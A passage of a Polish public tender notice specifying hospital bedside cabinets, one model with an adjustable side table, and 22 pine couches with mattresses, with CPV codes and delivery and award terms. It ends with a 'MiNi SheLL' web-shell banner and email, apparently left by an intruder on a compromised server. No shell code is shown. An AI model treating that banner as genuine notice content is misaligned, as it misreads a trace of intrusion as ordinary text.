II. Szafki przyłóżkowe
1.Szkielet szafki wykonany z profili stalowych oraz blachy ocynkowanej, pokrytej lakierem proszkowym, odpornym na uszkodzenia mechaniczne, chemiczne i promieniowanie UV
2.Szerokość szafki: 380 mm (? 20 mm)
Wysokość szafki: 800 mm (? 20 mm)
Głębokość szafki: 410 mm (? 20 mm)
3.Blat szafki wykonany z płyty laminowanej, zakończony tworzywową oblamówką, odporny na wilgoć, dezynfekcję oraz promieniowanie UV. 
4.Drzwi szafki oraz front szuflady pokryte lakierem proszkowym odpornym na uszkodzenia mechaniczne, chemiczne i promieniowanie UV 
5.Szuflada wysuwana na prowadnicach rolkowych z wkładem tworzywowym odejmowanym. Szuflada zabezpieczona przed wysunięciem
6.Pomiędzy szufladą a kontenerem półka na prasę o wysokości min. 120 mm, dostęp do półki z czterech stron.
7.Szafka wyposażona w półkę do odkładania obuwia lub  pojemników urologicznych  wykonana z siatki stalowej (średnica min. 5 mm)  pokrytej lakierem proszkowym. Półka wyprofilowana zabezpieczająca przed wypadnięciem przedmiotów.
8.Szafka wyposażona w haczyki do zawieszania ręczników
9.Szafka z możliwością zamocowania w przyszłości blatu bocznego, bez konieczności przeróbek technologicznych.
10.Koła jezdne podwójne w tym min. 2 z blokadą, z elastycznym, niebrudzącym podłóg bieżnikiem
11.Szafka przystosowana do mycia i dezynfekcji
12.Konstrukcja szafki umożliwiająca zamiany stron montażu blatu bocznego oraz otwierania drzwiczek  (ustawienie prawo i lewostronne)
13.Kolor frontów oraz blaty z możliwością wyboru kolorów z min. 6 szt. oraz konstrukcja z możliwością wyboru z min. dwóch kolorów w tym szary.<br>

III. Szafka przyłóżkowa z blatem bocznym
1.Szkielet szafki wykonany z profili stalowych oraz blachy ocynkowanej, pokrytej lakierem proszkowym, odpornym na uszkodzenia mechaniczne, chemiczne i promieniowanie UV
2.Szerokość szafki: 380 mm (? 20 mm)
Wysokość szafki: 800 mm (? 20 mm)
Głębokość szafki: 410 mm (? 20 mm)
Szerokość wraz z blatem bocznym: 600 mm (? 20 mm)
3.Wymiary półki bocznej: 500 x 350 mm (? 20mm)
4.Blat boczny regulowany bezstopniowo w zakresie: 800 -1200 mm (? 20 mm)
5.Blat boczny z  możliwością regulacji kąta o 30stopni  lub 60stopni
6.Blat szafki oraz blat półki bocznej wykonany z płyty laminowanej, zakończony tworzywową oblamówką, odporny na wilgoć, dezynfekcję oraz promieniowanie UV. Blat półki bocznej wyposażony w tworzywowe ranty zabezpieczające min. dwie krawędzie przed zsuwaniem się przedmiotów.  
7.Drzwi szafki oraz front szuflady pokryte lakierem proszkowym odpornym na uszkodzenia mechaniczne, chemiczne i promieniowanie UV 
8.Szuflada wysuwana na prowadnicach rolkowych z wkładem tworzywowymodejmowanym. Szuflada zabezpieczona przed wysunięciem
9.Pomiędzy szufladą a kontenerem półka na prasę o wysokości min. 120 mm, dostęp do półki z czterech stron.
10.Szafka wyposażona w półkę do odkładania obuwia lub  pojemników urologicznych  wykonana z siatki stalowej (średnica min. 5 mm)  pokrytej lakierem proszkowym. Półka wyprofilowana zabezpieczająca przed wypadnięciem   przedmiotów.
11.Szafka wyposażona w haczyki do zawieszania ręczników
12.Koła jezdne podwójne w tym min. 2 z blokadą, z elastycznym, niebrudzącym podłóg bieżnikiem
13.Dodatkowe piąte koło z blokadą zwiększające stabilność szafki przy rozłożonym blacie bocznym
14.Szafka przystosowana do mycia i dezynfekcji
15.Konstrukcja szafki umożliwiająca zamiany stron montażu blatu bocznego oraz otwierania drzwiczek  (ustawienie prawo i lewostronne)
16.Kolor frontów oraz blaty z możliwością wyboru kolorów z min. 6 szt. oraz konstrukcja z możliwością wyboru z min. dwóch kolorów w tym szary.<br>.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.21.20-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr 2 - dostawa 22szt.  tapczanów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> SZCZEGÓŁOWA SPECYFIKACJA TECHNICZNA -Zadanie Nr 2
1.Konstrukcja wykonana z naturalnego drewna sosnowego podwójnie lakierowana w kolorze orzech  
2.Szerokość całkowita 960 mm (+/- 10 mm)  
3.Długość całkowita: 2120 mm (+/- 10 mm) 
4.Podnoszony pojemnik na pościel o głębokości min. 180mm
5.Stelaż pod materac wykonany z desek o wymiarach min. 80 mm (szerokość) i min. 22 mm (grubość).    
6.Wyższy szczyt tapczanu zapewniający bezpieczeństwo osób śpiących i zapobiegający zsuwaniu się na zewnątrz poduszki podczas snu. 
Możliwość montażu wyższego szczytu tapczanu z lewej lub z prawej strony.  
7.Wyposażenie dodatkowe:
- Materac o wymiarach  900 mm (szerokość)  x 2050 mm (długość) x 160 mm (grubość) (+/- 10 mm) z pianki poliuretanowej w pokrowcu paroprzepuszczalnym, nieprzenikliwy dla cieczy, z możliwością wymiany pokrowca, pokrowiec z zamkiem błyskawicznym obszyty w literę  L  z okapnikiem, odporny na środki dezynfekujące - 22.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.21.20-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com